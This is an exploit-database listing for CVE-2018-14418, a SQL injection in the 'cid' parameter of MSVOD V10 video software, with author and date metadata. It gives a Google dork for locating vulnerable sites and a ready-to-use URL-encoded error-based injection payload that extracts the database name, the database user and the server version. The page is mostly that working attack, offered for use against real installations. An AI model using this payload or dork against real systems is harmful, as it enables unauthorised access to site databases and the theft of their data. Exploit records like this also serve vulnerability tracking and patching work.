[] NeoSense
E X P L O I T S
title author type platform port cve id

MSVOD 10 - 'cid' SQL Injection

Author: Hzllaga
type: webapps
platform: php
port: 
date_added: 2018-07-20 
date_updated: 2018-07-23 
verified: 0 
codes: CVE-2018-14418 
tags: SQL Injection (SQLi)
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: MSVOD V10 ¡V SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/

Payload:
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.